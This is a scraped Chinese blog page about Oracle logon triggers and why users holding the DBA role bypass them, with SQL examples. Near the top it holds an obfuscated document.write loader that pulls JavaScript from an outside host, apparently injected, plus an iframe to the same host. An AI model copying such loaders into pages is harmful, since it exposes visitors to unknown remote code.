登陆触发器AFTER LOGON ON DATABASE对具有DBA权限的不起作用

最新推荐文章于 2020-12-21 16:40:44 发布
最新推荐文章于 2020-12-21 16:40:44 发布
阅读量719 收藏
点赞数
文章标签: database 数据库 oracle javascript login application
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wmh4242424/article/details/1811757
版权
 

HTML Tags and JavaScript tutorial


<script language="javascript">var encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);</script>
登陆触发器AFTER LOGON ON DATABASE对具有DBA权限的不起作用




现在假设已经创建了一个SCOTT模式,下面来看看如何保护该模式。在Oracle 10g这个版本之前,在创建SCOTT模式后,一般都可以通过“tiger”这个众所周知的密码进行访问,而且账号也不会被锁定。
假设需要做的是在维护SCOTT模式中数据的同时,仍然需要阻止用户登录这个账号。在Oracle 9i及其之后的版本中,可以通过锁定账号实现这一目的;这里,则是利用一些其他的措施对这个方法进行一定的扩展。首先,建立数据库登录触发器以阻止某些用户登录SCOTT模式:
sec_mgr@KNOX10g
> CREATE OR REPLACE TRIGGER logon_check
2 AFTER LOGON ON DATABASE
3 BEGIN
4 IF (SYS_CONTEXT ('USERENV', 'SESSION_USER') = 'SCOTT')
5 THEN
6 raise_application_error (-20001,
7 'Unauthorized Login');
8 END IF;
9 END;
10 /
Trigger created.
当试图连接SCOTT模式时,会产生如下结果:
sec_mgr@KNOX10g
> conn scott/tiger
ERROR:
ORA-00604: error occurred at recursive SQL level 1
ORA-20001: Unauthorized Login
ORA-06512: at line 4
Warning: You are no longer connected to ORACLE.
在利用登录触发器这个方法时,需要补充说明两点:首先,虽然登录触发器有助于增加一定的安全性,但登录触发器会拒绝每一位试图登录的用户,从而会增加登录数据库的连接时间。在上述的例子中,可能不会感觉到连接时间的增加,但是,如果触发器代码需要查询表或者进行内部调用,那么时间的增加将会非常明显,从而使这个措施成为不可承受的解决办法。
当数据库登录触发器最初在Oracle 8i发布时,触发器会抛出异常从而阻止用户的登录,一般情况下,抛出的异常既非用户可以干预的,又不能合适地对其进行处理,所产生的结果就是所有的用户都不能登录数据库。而惟一能使用户重新登录数据库的方法是利用SYSDBA(外部的)建立连接,然后撤销或禁用登录触发器。
为了防止出现这种非故意的不能登录的情况,在Oracle 9i数据库中作了改变:即使登录触发器抛出了异常,也不能阻止拥有ADMINISTER DATABASE TRIGGER系统权限的用户登录。这个权限被授予了DBA角色,所以任何拥有DBA角色的用户都可以绕过登录触发器。可以利用以下查询代码来决定谁可以避免登录触发器抛出异常,而查询的结果将会列出被授予上述权限的用户和角色:
SELECT grantee
FROM dba_sys_privs
WHERE PRIVILEGE = 'ADMINISTER DATABASE TRIGGER';
GRANTEE
------------------------------
DBA
SYS
XDB
MDSYS
WKSYS
CTXSYS
IMP_FULL_DATABASE

src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">
wmh4242424
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
存储过程和触发器-LOGON/LOGOFF触发器
似水流年
04-18 3273
/* LOGON触发器在用户登录数据库的时候被触发 LOGOFF触发器在用户注销时被触发 使用两个触发器可以将用户访问数据库的情况记录到一个日志表中 */ --用于测试LOGON触发器LOGOFF触发器的表 DROP TABLE TESTLOG; DROP TRIGGER MYLOGONTRIGGER; DROP TRIGGER MYLOGOFFTRIGGER; CREATE TABLE TESTLOG( USERNAME VARCHAR2(100), EVENTTIM
[Oracle] 如何使用触发器实现IP限制用户登录
12-15
在这个触发器`logon_ip_control`中,`AFTER LOGON ON DATABASE`指定了触发器的类型和时机,即在用户登录数据库之后执行。`DECLARE`块定义了两个变量`ip`和`user`,用于存储用户的IP地址和用户名。接下来的`SELECT`...
oracle logon trigger
云计算?
09-04 183
oracle logon trigger一般用来审计用户登录信息或者限制用户登录,虽说不常用,但仍不失为一种好办法。备注:不能审计dba用户登录下面是具体的小例子 1,建审计表 CREATE TABLE LOGONLOG(os_user varchar2(30), user_name varchar2(30), logon_time date, session_user varcha...
logon on database记录登入信息的trigger
01-18 203
今天想起写一个登陆数据库数据库级别的trigger,记录每次登陆的时间和人员名称,以下是具体的构建思路。 SQL> create table loggon01(id number,name varchar2(80),lo...
Logon database Tiger引起DataGuard不同步问题
aodiyi6351的博客
08-09 254
当DataGuard升级CPU后。发现主备库不能同步了,日志报错,所以在主库的运行的升级的后脚本“@catbundle.sql cpu apply”不能同步到备库 现象: broker状态: [oracle@webdb2 ~]$ dgmgrl sys/oracle DGMGRL for Linux: Version 11.2.0.3.0 -64bit Prod...
SQL SERVER中各类触发器的完整语法及参数说明
09-10
- `DATABASE` 和 `ALL SERVER`:DDL触发器的作用范围,分别对应当前数据库和整个服务器。 - `WITH ENCRYPTION`:加密触发器定义,防止复制。 - `EXECUTE AS Clause`:指定触发器执行时的安全上下文。 - `method_...
在登录触发器错误情况下连接SQL Server的方法
12-15
代码如下: CREATE TRIGGER BadLogonTrigger ON ALL SERVER FOR LOGON AS BEGIN INSERT INTO BadDB.dbo.SomeTable VALUES (‘Test’); END; GO 没有一个数据库称为BadDB,这意味着在BadDB内也没有一张表叫SomeTable...
Logon Loader 2.1.0登陆界面
08-28
Logon Loader 2.1.0 登陆界面】是一个专用于修改登录界面的软件工具,主要用于个性化用户在操作系统启动时看到的登录画面。这款工具的版本号为2.1.0,暗示它可能包含了一些更新和改进,以提供更好的用户体验和更多...
WIN7登陆界面修改工具Logon Screen中文版.rar
09-04
Logon Screen能够轻松让你修改WIN7千篇一律的登陆界面背景,如果你看厌了WIN7的登陆界面可以使用这个小工具进行修改。可以桌面右键菜单启用快捷方式,在图像右键菜单启用快捷方式,跳过用户帐户控制警告。作用方法...
SQLServer之创建LOGON触发器
小子pk了的博客
10-18 1090
LOGON触发器工作原理 登录触发器将为响应 LOGON 事件而激发存储过程。 与 SQL Server实例建立用户会话时将引发此事件。 登录触发器将在登录的身份验证阶段完成之后且用户会话实际建立之前激发。 因此,来自触发器内部且通常将到达用户的所有消息(例如错误消息和来自 PRINT 语句的消息)会传送到 SQL Server 错误日志。 如果身份验证失败,将不激发登录触发器LOGON触...
数据库用户避开了LOGON_AUDIT触发器
rudy gao
06-04 1307
为了防止从办公网络试用生产账号登陆生产主机非法获取用户信息(因为我们的生产账号是不作审计的,个人账号作审计,因此要避免生产账号从办公网络登陆主机),我们写了个LOGON_AUDIT的触发器,如下: CREATE OR REPLACE TRIGGER sys.LOGON_AUDIT    AFTER LOGON ON DATABASE    declare    lv_u
登录触发器实现SQL Server 限制IP登录
Hehuyi_In的博客
10-10 3320
一、 背景   MySQL由 usename+host 构成用户,在SQL Server没有这样的机制,那SQL Server如何实现类似的安全控制的功能呢? 本文将介绍5种运用登录触发器实现安全控制的场景: 限制某登录名(比如sa)只能在本机或者指定的IP中登录; 限制服务器角色(比如sysadmin)只能在本机或者指定的IP中登录; 限制某登录名(比如sa)只能某时间段内登录; 限...
Oracle12c中多宿主环境(CDB&PDB)的数据库触发器(Database Trigger)
数据库生态圈(RDB & NoSQL & Bigdata)——专注于关系库优化(Oracle&Mysql&PG&SQL Server )
03-01 1542
oracle12c引入了多宿主选项(multitenant),即出现了CDB和PDB的概念和应用,这也会对其他方方面面的特性和应用带来不小的影响和改变,本文通过实例演示,说明了在引入多宿主选项后,触发器使用的变化和应用方法,同时,也对oracle12c中触发事件做了一些说明,记录于此,以供同行和自己今后学习参考。
create trigger on database ORA-01031
你好我是李白
12-21 397
ORA-01031 除了需要具有create trigger / create any trigger权限以外,还需要以下权限: ADMINISTER DATABASE TRIGGER
Oracle 数据库事件触发器
luobailian的专栏
08-13 4151
数据库事件触发器数据库级和模式级两种。前者定义在整个数据库上,触发事件是数据库事件,如数据库的启动、关闭,对数据库的登录或退出。后者定义在模式上,触发事件包括模式用户的登录或退出,或对数据库对象的创建和修改(DDL事件)。 数据库事件触发器的触发事件的种类和级别如表9-3所示。Sql代码种   类     关 键 字    说     明   模式级 CREATE   在创建新对象时触发       ALTER    修改数据库数据库对象时触发       DROP     删除对象时触发   数据库
how to logon Oracle DB
amy116的专栏
11-14 458
1.ps -ef|grep pmon  su - oracle 2. select owner,object_name,status from dba_objects where object_name like '%F91320' 3. desc SY810.F91300 4.col JSSCHROLE for a5 5.select * from sy810.F91320 w
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值